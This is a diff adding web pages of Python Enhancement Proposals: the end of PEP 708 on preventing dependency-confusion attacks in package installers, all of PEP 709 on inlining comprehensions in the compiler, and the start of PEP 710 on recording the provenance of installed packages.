    • Note: This only applies to remote repositories; repositories that +exist on the local filesystem SHOULD always be implicitly allowed to be +merged to any remote repository.
    • +
    +
  8. +
  9. Filter out any files that do not match the current platform, Python version, +etc.
  10. +
  11. Pass that list of files into the resolver where it will attempt to resolve +the “best” match out of those files, irrespective of what repository it came +from.
  12. +
+

This is somewhat subtle, but the key things in the recommendation are:

+
    +
  • Users who are using lock files or requirements files that include specific +hashes of artifacts that are “valid” are assumed to be protected by nature of +those hashes, since the rest of these recommendations would apply during +hash generation. Thus, we filter out unknown hashes up front.
  • +
  • If the user has explicitly told the installer that it wants to fetch a project +from a certain set of repositories, then there is no reason to question that +and we assume that they’ve made sure it is safe to merge those namespaces.
  • +
  • If the project in question only comes from a single repository, then there is no chance of dependency confusion, so there’s no reason to do anything but allow it.
  • +
  • We check for the metadata in this PEP before filtering out based on platform, +Python version, etc., because we don’t want errors that only show up on +certain platforms, Python versions, etc.
  • +
  • If nothing tells us merging the namespaces is safe, we refuse to implicitly +assume it is, and generate an error instead.
  • +
  • Otherwise we merge the namespaces, and continue on.
  • +
+

This algorithm ensures that an installer never assumes that two disparate +namespaces can be flattened into one, which for all practical purposes +eliminates the possibility of any kind of dependency confusion attack, while +still giving power throughout the stack in a safe way to allow people to +explicitly declare when those disparate namespaces are actually one logical +namespace that can be safely merged.

+

The above algorithm is mostly a conceptual model. In reality the algorithm may +end up being slightly different in order to be more privacy preserving and +faster, or even just adapted to fit a specific installer better.
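As a rough, non-normative sketch of that conceptual model (the repository and file types here are hypothetical simplifications, not any real installer’s API):

from dataclasses import dataclass

class InstallerError(Exception):
    pass

@dataclass(frozen=True)
class Repo:
    url: str
    is_local: bool = False

@dataclass(frozen=True)
class File:
    filename: str
    repository: Repo
    sha256: str

def metadata_allows_merging(remotes: set[Repo]) -> bool:
    # Placeholder: would consult the "Tracks" and "Alternate Locations"
    # metadata for the repositories in question.
    return False

def discover(files: list[File], explicit_repos=None, known_hashes=None):
    # Steps 1-2: gather all files, dropping any with unknown hashes.
    candidates = [f for f in files
                  if known_hashes is None or f.sha256 in known_hashes]
    # Step 3: explicit user configuration for this project wins outright.
    if explicit_repos is not None:
        return [f for f in candidates if f.repository in explicit_repos]
    # Step 4: refuse to implicitly merge disparate remote namespaces.
    remotes = {f.repository for f in candidates if not f.repository.is_local}
    if len(remotes) > 1 and not metadata_allows_merging(remotes):
        raise InstallerError("project found in multiple unrelated repositories")
    # Step 5 onwards: platform/Python-version filtering and resolution
    # would happen after this point, exactly as today.
    return candidates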

+
+
+

Explicit Configuration for End Users

+

This PEP avoids dictating or recommending a specific mechanism by which an installer allows an end user to configure exactly what repositories they want a specific package to be installed from. However, it does recommend that installers provide some mechanism for end users to provide that configuration, as without it users can end up in a DoS situation in cases like torchtriton, where they’re just completely broken unless they resolve the namespace collision externally (get the name taken down on one repository, stand up a personal repository that handles the merging, etc.).

+

This configuration also allows end users to pre-emptively secure themselves +during what is likely to be a long transition until the default behavior is +safe.

+
+
+
+

How to Communicate This

+
+

Note

+

This example is pip-specific and assumes specifics about how pip will choose to implement this PEP; it’s included as an example of how we can communicate this change, and is not intended to constrain pip or any other installer in how they implement this. This may ultimately be the actual basis for communication, and if so will need to be edited for accuracy and clarity.

+

This section should be read as if it were an entire “post” to communicate this +change that could be used for a blog post, email, or discourse post.

+
+

There’s a long-standing class of attacks that are called “dependency confusion” attacks, which roughly boil down to an individual expecting to get package A, but instead getting package B. In Python, this almost always happens due to the end user having configured multiple repositories: they expect package A to come from repository X, but someone is able to publish package B with the same name as package A to repository Y.

+

There are a number of ways to mitigate against these attacks today, but they all +require that the end user explicitly go out of their way to protect themselves, +rather than it being inherently safe.

+

In an effort to secure pip’s users and protect them from these types of attacks, +we will be changing how pip discovers packages to install.

+
+

What is Changing?

+

When pip discovers that the same project is available from multiple remote +repositories, by default it will generate an error and refuse to proceed rather +than make a guess about which repository was the correct one to install from.

+

Projects that natively publish to multiple repositories will be given the +ability to safely “link” their repositories together so that pip does not error +when those repositories are used together.

+

End users of pip will be given the ability to explicitly define one or more +repositories that are valid for a specific project, causing pip to only consider +those repositories for that project, and avoiding generating an error +altogether.

+

See TBD for more information.

+
+
+

Who is Affected?

+

Users who are installing from multiple remote (i.e. not present on the local filesystem) repositories may be affected by having pip error instead of successfully installing if:

+
    +
  • They install a project where the same “name” is being served by multiple +remote repositories.
  • +
  • The project name that is available from multiple remote repositories has not +used one of the defined mechanisms to link those repositories together.
  • +
  • The user invoking pip has not used the defined mechanism to explicitly control +what repositories are valid for a particular project.
  • +
+

Users who are not using multiple remote repositories will not be affected at +all, which includes users who are only using a single remote repository, plus a +local filesystem “wheel house”.

+
+
+

What do I need to do?

+
+

As a pip User?

+

If you’re using only a single remote repository you do not have to do anything.

+

If you’re using multiple remote repositories, you can opt into the new behavior +by adding --use-feature=TBD to your pip invocation to see if any of your +dependencies are being served from multiple remote repositories. If they are, +you should audit them to determine why they are, and what the best remediation +step will be for you.

+

Once this behavior becomes the default, you can opt out of it temporarily by +adding --use-deprecated=TBD to your pip invocation.

+

If you’re using projects that are not hosted on a public repository, but you still have the public repository as a fallback, consider configuring pip with a repository file to be explicit about where that dependency is meant to come from, so that registration of that name in a public repository cannot cause pip to error for you.

+
+
+

As a Project Owner?

+

If you only publish your project to a single repository, then you do not have to +do anything.

+

If you publish your project to multiple repositories that are intended to be +used together at the same time, configure all repositories to serve the +alternate repository metadata to prevent breakages for your end users.

+

If you publish your project to a single repository, but it is commonly used in conjunction with other repositories, consider preemptively registering your names with those repositories to prevent a third party from being able to cause your users’ pip install invocations to start failing. This may not be available if your project name is too generic or if the repositories have policies that prevent defensive name squatting.

+
+
+

As a Repository Operator?

+

You’ll need to decide how you intend for your repository to be used by your end +users and how you want them to use it.

+

For private repositories that host private projects, it is recommended that you +mirror the public projects that your users depend on into your own repository, +taking care not to let a public project merge with a private project, and tell +your users to use the --index-url option to use only your repository.

+

For public repositories that host public projects, you should implement the +alternate repository mechanism and enable the owners of those projects to +configure the list of repositories that their project is available from if they +make it available from more than one repository.

+

For public repositories that “track” another repository, but provide +supplemental artifacts such as wheels built for a specific platform, you should +implement the “tracks” metadata for your repository. However, this information +MUST NOT be settable by end users who are publishing projects to your +repository. See TBD for more information.

+
+
+
+
+

Rejected Ideas

+

Note: Some of these are somewhat specific to pip, but any solution that doesn’t +work for pip isn’t a particularly useful solution.

+
+

Implicitly allow mirrors when the list of files are the same

+

If every repository returns the exact same list of files, then it is safe to +consider those repositories to be the same namespace and implicitly merge them. +This would possibly mean that mirrors would be automatically allowed without any +work on any user or repository operator’s part.

+

Unfortunately, this has two failings that make it undesirable:

+
    +
  • It only solves the case of mirrors that are exact copies of each other, but +not repositories that “track” another one, which ends up being a more generic +solution.
  • +
  • Even in the case of exact mirrors, multiple repositories mirroring each other form a distributed system that will not always be fully consistent with each other; it is effectively an eventually consistent system. This means that repositories that relied on this implicit heuristic would see sporadic failures due to drift between the source repository and the mirror repositories.
  • +
+
+
+

Provide a mechanism to order the repositories

+

Providing some mechanism to give the repositories an order, and then short +circuiting the discovery algorithm when it finds the first repository that +provides files for that project is another workable solution that is safe if the +order is specified correctly.

+

However, this has been rejected for a number of reasons:

+
    +
  • We’ve spent 15+ years educating users that the ordering of repositories being +specified is not meaningful, and they effectively have an undefined order. It +would be difficult to backpedal on that and start saying that now order +matters.
  • +
  • Users can easily rearrange the order that they specify their repositories in +within a single location, but when loading repositories from multiple +locations (env var, conf file, requirements file, cli arguments) the order is +hard coded into pip. While it would be a deterministic and documented order, +there’s no reason to assume it’s the order that the user wants their +repositories to be defined in, forcing them to contort how they configure pip +so that the implicit ordering ends up being the correct one.
  • +
  • The above can be mitigated by providing a way to explicitly declare the order +rather than by implicitly using the order they were defined in; however, that +then means that the protections are not provided unless the user does some +explicit configuration.
  • +
  • Ordering assumes that one repository is always preferred over another +repository without any way to decide on a project by project basis.
  • +
  • Relying on ordering is subtle; if I look at an ordering of repositories, I +have no way of knowing or ensuring in advance what names are going +to come from what repositories. I can only know in that moment what names are +provided by which repositories.
  • +
  • Relying on ordering is fragile. There’s no reason to assume that two disparate +repositories are not going to have random naming collisions—what happens if +I’m using a library from a lower priority repository and then a higher +priority repository happens to start having a colliding name?
  • +
  • In cases where ordering does the wrong thing, it does so silently, with no +feedback given to the user. This is by design because it doesn’t actually know +what the wrong or right thing is, it’s just hoping that order will give the +right thing, and if it does then users are protected without any breakage. +However, when it does the wrong thing, users are left with a very confusing +behavior coming from pip, where it’s just silently installing the wrong thing.
  • +
+

There is a variant of this idea which effectively says that it’s really just PyPI’s nature of open registration that causes the real problems, so if we treat all repositories except the “default” one as equal priority, and treat the default one as a lower priority, then we’ll fix things.

+

That is true in that it does improve things, but it has many of the same +problems as the general ordering idea (though not all of them).

+

It also assumes that PyPI, or whatever repository is configured as the “default”, is the only repository with open registration of names. However, projects like Piwheels, which users are expected to use in addition to PyPI, also effectively have open registration of names, since Piwheels tracks whatever names are registered on PyPI.

+
+
+

Rely on repository proxies

+

One possible solution is, instead of having the installer solve this, to depend on repository proxies that can intelligently merge multiple repositories safely. This could provide a better experience for people with complex needs, because such proxies can have configuration and features dedicated to the problem space.

+

However, that has been rejected because:

+
    +
  • It requires users to opt into using them, unless we also remove the facilities +to have more than one repository in installers to force users into using a +repository proxy when they need multiple repositories.
      +
    • Removing facilities to have more than one repository configured has been +rejected because it would be too disruptive to end users.
    • +
    +
  • +
  • A user may need different outcomes of merging multiple repositories in +different contexts, or may need to merge different, mutually exclusive +repositories. This means they’ll need to actually set up multiple repository +proxies for each unique set of options.
  • +
  • It requires users to maintain infrastructure or it requires adding features in +installers to automatically spin up a repository for each invocation.
  • +
  • It doesn’t actually change the requirement to need to have a solution to these +problems, it just shifts the responsibility of implementation from installers +to some repository proxy, but in either case we still need something that +figures out how to merge these disparate namespaces.
  • +
  • Ultimately, most users do not want to have to stand up a repository proxy just +to safely interact with multiple repositories.
  • +
+
+
+

Rely only on hash checking

+

Another possible solution is to rely on hash checking, since with hash checking +enabled users cannot get an artifact that they didn’t expect; it doesn’t matter +if the namespaces are incorrectly merged or not.

+

This is certainly a solution; unfortunately it also suffers from problems that +make it unworkable:

+
    +
  • It requires users to opt in to it, so users are still unprotected by default.
  • +
  • It requires users to do a bunch of labor to manage their hashes, which is +something that most users are unlikely to be willing to do.
  • +
  • It is difficult and verbose to get the protection when users are not using a +requirements.txt file as the source of their dependencies (this affects +build time dependencies, and dependencies provided at the command line).
  • +
  • It only sort of solves the problem; in a way it just shifts the responsibility of the problem to whatever system is generating the hashes that the installer would use. If that system isn’t a human manually validating hashes, which it’s unlikely to be, then we’ve just shifted the question of how to merge these namespaces to whatever tool implements the maintenance of the hashes.
  • +
+
+
+

Require all projects to exist in the “default” repository

+

Another idea is that we can narrow the scope of --extra-index-url such that +its only supported use is to refer to supplemental repositories to the default +repository, effectively saying that the default repository defines the +namespace, and every additional repository just extends it with extra packages.

+

The implementation of this would roughly be to require that the project MUST +be registered with the default repository in order for any additional +repositories to work.

+

This sort of works if you successfully narrow the scope in that way, but +ultimately it has been rejected because:

+
    +
  • Users are unlikely to understand or accept this reduced scope, and thus are +likely to attempt to continue to use it in the now unsupported fashion.
      +
    • This is complicated by the fact that with the scope now narrowed, users who +have the excluded workflow no longer have any alternative besides setting up +a repository proxy, which takes infrastructure and effort that they +previously didn’t have to do.
    • +
    +
  • +
  • It assumes that just because a name in an “extra” repository is the same as in +the default repository, that they are the same project. If we were starting +from scratch in a brand new ecosystem then maybe we could make this assumption +from the start and make it stick, but it’s going to be incredibly difficult to +get the ecosystem to adjust to that change.
      +
    • This is a fundamental issue with this approach; the underlying problem that drives dependency confusion is that we’re taking disparate namespaces and flattening them into one. This approach essentially just declares that flattening to be OK, and attempts to mitigate it by requiring everyone to register their names.
    • +
    +
  • +
  • Because of the above assumption, in cases where a name in an extra repository +collides by accident with the default repository, it’s going to appear to work +for those users, but they are going to be silently in a state of dependency +confusion.
      +
    • This is made worse by the fact that the person who owns the name that is +allowing this to work is going to be completely unaware of the role that +they’re playing for that user, and might possibly delete their project or +hand it off to someone else, potentially allowing them to inadvertently +allow a malicious user to take it over.
    • +
    +
  • +
  • Users are likely to attempt to get back to a working state by registering +their names in their default repository as a defensive name squat. Their +ability to do this will depend on the specific policies of their default +repository, whether someone already has that name, whether it’s too generic, +etc. As a best case scenario it will cause needless placeholder projects that +serve no purpose other than to secure some internal use of a name.
  • +
+
+
+

Move to Globally Unique Names

+

The main reason this problem exists is that we don’t have globally unique names, +we have locally unique names that exist under multiple namespaces that we are +attempting to merge into a single flat namespace. If we could instead come up +with a way to have globally unique names, we could sidestep the entire issue.

+

This idea has been rejected because:

+
    +
  • Generating globally unique but secure names that are also meaningful to humans +is a nearly impossible feat without piggybacking off of some kind of +centralized database. To my knowledge the only systems that have managed to do +this end up piggybacking off of the domain system and refer to packages by +URLs with domains etc.
  • +
  • Even if we come up with a mechanism to get globally unique names, our ability +to retrofit that into our decades old system is practically zero without +burning it all to the ground and starting over. The best we could probably do +is declare that all non globally unique names are implicitly names on the PyPI +domain name, and force everyone with a non PyPI package to rename their +package.
  • +
  • This would upend so many core assumptions and fundamental parts of our current +system it’s hard to even know where to start to list them.
  • +
+
+
+

Only recommend that installers offer explicit configuration

+

One idea that has come up is to essentially just implement the explicit configuration and not make any other changes to anything else. The specific proposal for a mapping policy is what actually inspired the explicit configuration option, and proposed a file that looked something like:

+
{
+  "repositories": {
+    "PyTorch": ["https://download.pytorch.org/whl/nightly"],
+    "PyPI": ["https://pypi.org/simple"]
+  },
+  "mapping": [
+    {
+      "paths": ["torch*"],
+      "repositories": ["PyTorch"],
+      "terminating": true
+    },
+    {
+      "paths": ["*"],
+      "repositories": ["PyPI"]
+    }
+  ]
+}
+
+
+

The recommendation to have explicit configuration pushes the decision on how to +implement that onto each installer, allowing them to choose what works best for +their users.
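For illustration only, resolving a project name against such a mapping might look like the following; this sketch assumes fnmatch-style glob paths and that a matching entry marked terminating ends the search:

import fnmatch

def repositories_for(project: str, config: dict) -> list[str]:
    # Walk the mapping in order, collecting repository URLs; an entry
    # marked "terminating" ends the search once it matches.
    urls: list[str] = []
    for entry in config["mapping"]:
        if any(fnmatch.fnmatch(project, pattern) for pattern in entry["paths"]):
            for name in entry["repositories"]:
                urls.extend(config["repositories"][name])
            if entry.get("terminating", False):
                break
    return urls

With the configuration above, repositories_for("torchvision", config) would return only the PyTorch repository, while any other name would fall through to PyPI.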

+

Ultimately only implementing some kind of explicit configuration was rejected +because by its nature it’s opt in, so it doesn’t protect average users who are +least capable to solve the problem with the existing tools; by adding additional +protections alongside the explicit configuration, we are able to protect all +users by default.

+

Additionally, relying on only explicit configuration also means that every end +user has to resolve the same problem over and over again, even in cases like +mirrors of PyPI, Piwheels, PyTorch, etc. In each and every case they have to sit +there and make decisions (or find some example to cargo cult) in order to be +secure. Adding extra features into the mix allows us to centralize those +protections where we can, while still giving advanced end users the ability to +completely control their own destiny.

+
+
+

Scopes à la npm

+

There’s been some suggestion that scopes, similar to how npm has implemented them, may ultimately solve this. Ultimately, scopes do not change anything about this problem. As far as I know, scopes in npm are not globally unique; they’re tied to a specific registry just like unscoped names are. However, what scopes do enable is an obvious mechanism for grouping related projects and the ability for a user or organization on npm.org to claim an entire scope, which makes explicit configuration significantly easier to handle, because you can be assured that there’s a whole little slice of the namespace that wholly belongs to you, and you can easily write a rule that assigns an entire scope to a specific non-public registry.

+

Unfortunately, it basically ends up being an easier version of the idea to only use explicit configuration, which works OK in npm because it’s not particularly common for people to use their own registries, but in Python we encourage you to do just that.

+
+
+

Define and Standardize the “Explicit Configuration”

+

This PEP recommends that installers have a mechanism for explicit configuration of which repository a particular project comes from, but it does not define what that mechanism is. We purposefully leave that undefined, as it is closely tied to the UX of each individual installer, and we want to allow each installer to expose that configuration in whatever way it sees fit for its particular use cases.

+

Further, when the idea of defining that mechanism came up, none of the other +installers seemed particularly interested in having that mechanism defined for +them, suggesting that they were happy to treat that as part of their UX.

+

Finally, that mechanism, if we did choose to define it, deserves its own PEP rather than being baked into the changes to the repository API in this PEP; it can be a future PEP if we ultimately decide we do want to go down the path of standardizing it.

+
+
+
+

Acknowledgements

+

Thanks to Trishank Kuppusamy for kick-starting the discussion that led to this PEP with his proposal.

+

Thanks to Paul Moore, Pradyun Gedam, Steve Dower, and Trishank Kuppusamy for +providing early feedback and discussion on the ideas in this PEP.

+

Thanks to Jelle Zijlstra, C.A.M. Gerlach, Hugo van Kemenade, and Stefano Rivera +for copy editing and improving the structure and quality of this PEP.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0708.rst

+

Last modified: 2024-08-17 01:15:14 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0709/index.html b/pep-0709/index.html new file mode 100644 index 00000000000..7b68819fcb0 --- /dev/null +++ b/pep-0709/index.html @@ -0,0 +1,436 @@ + + + + + + + + PEP 709 – Inlined comprehensions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 709 – Inlined comprehensions

+
+
Author:
+
Carl Meyer <carl at oddbird.net>
+
Sponsor:
+
Guido van Rossum <guido at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
24-Feb-2023
+
Python-Version:
+
3.12
+
Post-History:
+
25-Feb-2023
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Abstract

+

Comprehensions are currently compiled as nested functions, which provides +isolation of the comprehension’s iteration variable, but is inefficient at +runtime. This PEP proposes to inline list, dictionary, and set comprehensions +into the code where they are defined, and provide the expected isolation by +pushing/popping clashing locals on the stack. This change makes comprehensions +much faster: up to 2x faster for a microbenchmark of a comprehension alone, +translating to an 11% speedup for one sample benchmark derived from real-world +code that makes heavy use of comprehensions in the context of doing actual work.

+
+
+

Motivation

+

Comprehensions are a popular and widely-used feature of the Python language. +The nested-function compilation of comprehensions optimizes for compiler +simplicity at the expense of performance of user code. It is possible to +provide near-identical semantics (see Backwards Compatibility) with much +better runtime performance for all users of comprehensions, with only a small +increase in compiler complexity.

+
+
+

Rationale

+

Inlining is a common compiler optimization in many languages. Generalized +inlining of function calls at compile time in Python is near-impossible, since +call targets may be patched at runtime. Comprehensions are a special case, +where we have a call target known statically in the compiler that can neither +be patched (barring undocumented and unsupported fiddling with bytecode +directly) nor escape.

+

Inlining also permits other compiler optimizations of bytecode to be more +effective, because they can now “see through” the comprehension bytecode, +instead of it being an opaque call.

+

Normally a performance improvement would not require a PEP. In this case, the +simplest and most efficient implementation results in some user-visible effects, +so this is not just a performance improvement, it is a (small) change to the +language.

+
+
+

Specification

+

Given a simple comprehension:

+
def f(lst):
+    return [x for x in lst]
+
+
+

The compiler currently emits the following bytecode for the function f:

+
1           0 RESUME                   0
+
+2           2 LOAD_CONST               1 (<code object <listcomp> at 0x...)
+            4 MAKE_FUNCTION            0
+            6 LOAD_FAST                0 (lst)
+            8 GET_ITER
+           10 CALL                     0
+           20 RETURN_VALUE
+
+Disassembly of <code object <listcomp> at 0x...>:
+2           0 RESUME                   0
+            2 BUILD_LIST               0
+            4 LOAD_FAST                0 (.0)
+      >>    6 FOR_ITER                 4 (to 18)
+           10 STORE_FAST               1 (x)
+           12 LOAD_FAST                1 (x)
+           14 LIST_APPEND              2
+           16 JUMP_BACKWARD            6 (to 6)
+      >>   18 END_FOR
+           20 RETURN_VALUE
+
+
+

The bytecode for the comprehension is in a separate code object. Each time +f() is called, a new single-use function object is allocated (by +MAKE_FUNCTION), called (allocating and then destroying a new frame on the +Python stack), and then immediately thrown away.

+

Under this PEP, the compiler will emit the following bytecode for f() +instead:

+
1           0 RESUME                   0
+
+2           2 LOAD_FAST                0 (lst)
+            4 GET_ITER
+            6 LOAD_FAST_AND_CLEAR      1 (x)
+            8 SWAP                     2
+           10 BUILD_LIST               0
+           12 SWAP                     2
+      >>   14 FOR_ITER                 4 (to 26)
+           18 STORE_FAST               1 (x)
+           20 LOAD_FAST                1 (x)
+           22 LIST_APPEND              2
+           24 JUMP_BACKWARD            6 (to 14)
+      >>   26 END_FOR
+           28 SWAP                     2
+           30 STORE_FAST               1 (x)
+           32 RETURN_VALUE
+
+
+

There is no longer a separate code object, nor creation of a single-use function +object, nor any need to create and destroy a Python frame.

+

Isolation of the x iteration variable is achieved by the combination of the +new LOAD_FAST_AND_CLEAR opcode at offset 6, which saves any outer value +of x on the stack before running the comprehension, and 30 STORE_FAST, +which restores the outer value of x (if any) after running the +comprehension.
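A small example of the user-visible semantics being preserved under this scheme:

x = "outer"
lst = [1, 2, 3]
doubled = [x * 2 for x in lst]
assert doubled == [2, 4, 6]
assert x == "outer"  # the comprehension's x neither leaked nor clobbered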

+

If the comprehension accesses variables from the outer scope, inlining avoids +the need to place these variables in a cell, allowing the comprehension (and all +other code in the outer function) to access them as normal fast locals instead. +This provides further performance gains.

+

In some cases, the comprehension iteration variable may be a global or cellvar +or freevar, rather than a simple function local, in the outer scope. In these +cases, the compiler also internally pushes and pops the scope information for +the variable when entering/leaving the comprehension, so that semantics are +maintained. For example, if the variable is a global outside the comprehension, +LOAD_GLOBAL will still be used where it is referenced outside the +comprehension, but LOAD_FAST / STORE_FAST will be used within the +comprehension. If it is a cellvar/freevar outside the comprehension, the +LOAD_FAST_AND_CLEAR / STORE_FAST used to save/restore it do not change +(there is no LOAD_DEREF_AND_CLEAR), meaning that the entire cell (not just +the value within it) is saved/restored, so the comprehension does not write to +the outer cell.

+

Comprehensions occurring in module or class scope are also inlined. In this +case, the comprehension will introduce usage of fast-locals (LOAD_FAST / +STORE_FAST) for the comprehension iteration variable within the +comprehension only, in a scope where otherwise only LOAD_NAME / +STORE_NAME would be used, maintaining isolation.

+

In effect, comprehensions introduce a sub-scope where local variables are fully +isolated, but without the performance cost or stack frame entry of a call.

+

Generator expressions are currently not inlined in the reference implementation +of this PEP. In the future, some generator expressions may be inlined, where the +returned generator object does not leak.

+

Asynchronous comprehensions are inlined the same as synchronous ones; no special +handling is needed.

+
+
+

Backwards Compatibility

+

Comprehension inlining will cause the following visible behavior changes. No +changes in the standard library or test suite were necessary to adapt to these +changes in the implementation, suggesting the impact in user code is likely to +be minimal.

+

Specialized tools depending on undocumented details of compiler bytecode output +may of course be affected in ways beyond the below, but these tools already must +adapt to bytecode changes in each Python version.

+
+

locals() includes outer variables

+

Calling locals() within a comprehension will include all locals of the +function containing the comprehension. E.g. given the following function:

+
def f(lst):
+    return [locals() for x in lst]
+
+
+

Calling f([1]) in current Python will return:

+
[{'.0': <list_iterator object at 0x7f8d37170460>, 'x': 1}]
+
+
+

where .0 is an internal implementation detail: the synthetic sole argument +to the comprehension “function”.

+

Under this PEP, it will instead return:

+
[{'lst': [1], 'x': 1}]
+
+
+

This now includes the outer lst variable as a local, and eliminates the +synthetic .0.

+
+
+

No comprehension frame in tracebacks

+

Under this PEP, a comprehension will no longer have its own dedicated frame in +a stack trace. For example, given this function:

+
def g():
+    raise RuntimeError("boom")
+
+def f():
+    return [g() for x in [1]]
+
+
+

Currently, calling f() results in the following traceback:

+
Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+  File "<stdin>", line 5, in f
+  File "<stdin>", line 5, in <listcomp>
+  File "<stdin>", line 2, in g
+RuntimeError: boom
+
+
+

Note the dedicated frame for <listcomp>.

+

Under this PEP, the traceback looks like this instead:

+
Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+  File "<stdin>", line 5, in f
+  File "<stdin>", line 2, in g
+RuntimeError: boom
+
+
+

There is no longer an extra frame for the list comprehension. The frame for the +f function has the correct line number for the comprehension, however, so +this simply makes the traceback more compact without losing any useful +information.

+

It is theoretically possible that code using warnings with the stacklevel +argument could observe a behavior change due to the frame stack change. In +practice, however, this seems unlikely. It would require a warning raised in +library code that is always called through a comprehension in that same +library, where the warning is using a stacklevel of 3+ to bypass the +comprehension and its containing function and point to a calling frame outside +the library. In such a scenario it would usually be simpler and more reliable +to raise the warning closer to the calling code and bypass fewer frames.

+
+
+

Tracing/profiling will no longer show a call/return for the comprehension

+

Naturally, since list/dict/set comprehensions will no longer be implemented as a +call to a nested function, tracing/profiling using sys.settrace or +sys.setprofile will also no longer reflect that a call and return have +occurred.

+
+
+
+

Impact on other Python implementations

+

Per comments from representatives of GraalPython and +PyPy, +they would likely feel the need to adapt to the observable behavior changes +here, given the likelihood that someone, at some point, will depend on them. +Thus, all else equal, fewer observable changes would be less work. But these +changes (at least in the case of GraalPython) should be manageable “without much +headache”.

+
+
+

How to Teach This

+

It is not intuitively obvious that comprehension syntax will or should result +in creation and call of a nested function. For new users not already accustomed +to the prior behavior, I suspect the new behavior in this PEP will be more +intuitive and require less explanation. (“Why is there a <listcomp> line in +my traceback when I didn’t define any such function? What is this .0 +variable I see in locals()?”)

+
+
+

Security Implications

+

None known.

+
+
+

Reference Implementation

+

This PEP has a reference implementation in the form of a PR against the CPython main +branch which passes all tests.

+

The reference implementation performs the micro-benchmark ./python -m pyperf +timeit -s 'l = [1]' '[x for x in l]' 1.96x faster than the main branch (in a +build compiled with --enable-optimizations.)

+

The reference implementation performs the comprehensions benchmark in the +pyperformance benchmark suite +(which is not a micro-benchmark of comprehensions alone, but tests +real-world-derived code doing realistic work using comprehensions) 11% faster +than main branch (again in optimized builds). Other benchmarks in +pyperformance (none of which use comprehensions heavily) don’t show any impact +outside the noise.

+

The implementation has no impact on non-comprehension code.

+
+
+

Rejected Ideas

+
+

More efficient comprehension calling, without inlining

+

An alternate approach +introduces a new opcode for “calling” a comprehension in streamlined fashion +without the need to create a throwaway function object, but still creating a new +Python frame. This avoids all of the visible effects listed under Backwards +Compatibility, and provides roughly half of the performance benefit (1.5x +improvement on the microbenchmark, 4% improvement on comprehensions +benchmark in pyperformance.) It also requires adding a new pointer to the +_PyInterpreterFrame struct and a new Py_INCREF on each frame +construction, meaning (unlike this PEP) it has a (very small) performance cost +for all code. It also provides less scope for future optimizations.

+

This PEP takes the position that full inlining offers sufficient additional +performance to more than justify the behavior changes.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0709.rst

+

Last modified: 2023-12-15 15:06:12 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0710/index.html b/pep-0710/index.html new file mode 100644 index 00000000000..d9079bcc476 --- /dev/null +++ b/pep-0710/index.html @@ -0,0 +1,758 @@ + + + + + + + + PEP 710 – Recording the provenance of installed packages | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 710 – Recording the provenance of installed packages

+
+
Author:
+
Fridolín Pokorný <fridolin.pokorny at gmail.com>
+
Sponsor:
+
Donald Stufft <donald at stufft.io>
+
PEP-Delegate:
+
Paul Moore <p.f.moore at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
27-Mar-2023
+
Post-History:
+
03-Dec-2021, +30-Jan-2023, +14-Mar-2023, +03-Apr-2023
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP describes a way to record the provenance of installed Python distributions. +The record is created by an installer and is available to users in +the form of a JSON file provenance_url.json in the .dist-info directory. +The mentioned JSON file captures additional metadata to allow recording a URL to a +distribution package together with the installed distribution hash. +This proposal is built on top of PEP 610 following its corresponding +canonical PyPA spec and complements direct_url.json +with provenance_url.json for when packages are identified by a name, and +optionally a version.

+
+
+

Motivation

+

Installing a Python Project involves downloading a Distribution Package +from a Package Index +and extracting its content to an appropriate place. After the installation +process is done, information about the release artifact used as well as its source +is generally lost. However, there are use cases for keeping records of +distributions used for installing packages and their provenance.

+

Python wheels can be built with different compiler flags or supporting +different wheel tags. In both cases, users might get into a situation in which +multiple wheels might be considered by installers (possibly from different +package indexes) and immediately finding out which wheel file was actually used +during the installation might be helpful. This way, developers can use +information about wheels to debug issues making sure the desired wheel was +actually installed. Another use case could be tools reporting software +installed, such as tools reporting a SBOM (Software Bill of Materials), that might +give more accurate reports. Yet another use case could be reconstruction of the +Python environment by pinning each installed package to a specific distribution +artifact consumed from a Python package index.

+
+
+

Rationale

+

The motivation described in this PEP is an extension of Recording the +Direct URL Origin of installed distributions +specification. In addition to recording provenance information for packages +installed using a direct URL, installers should also do so for packages +installed by name (and optionally version) from Python package indexes.

+

The idea described in this PEP originated in a tool called micropipenv +that is used to install +distribution packages in containerized +environments (see the reported issue thoth-station/micropipenv#206). +Currently, the assembled containerized application does not implicitly carry +information about the provenance of installed distribution packages +(unless these are installed from full URLs and recorded via direct_url.json). +This requires container image suppliers to link +container images with the corresponding build process, its configuration and +the application source code for checking requirements files in cases when +software present in containerized environments needs to be audited.

+

The subsequent discussion in the Discourse thread also brought up +pip’s new --report option that can +generate a detailed JSON report about +the installation process. This option could help with the provenance problem +this PEP approaches. Nevertheless, this option needs to be explicitly passed +to pip to obtain the provenance information, and includes additional metadata that +might not be necessary for checking the provenance (such as Python version +requirements of each distribution package). Also, this option is +specific to pip as of the writing of this PEP.

+

Note that the current spec for recording installed packages defines a RECORD file that records installed files, but not the distribution artifact from which these files were obtained. Auditing installed artifacts can be performed based on matching the entries listed in the RECORD file. However, this technique requires a pre-computed database of the files each artifact provides or a comparison with the actual artifact content. Both approaches are relatively expensive and time-consuming operations, which could be eliminated with the proposed provenance_url.json file.

+

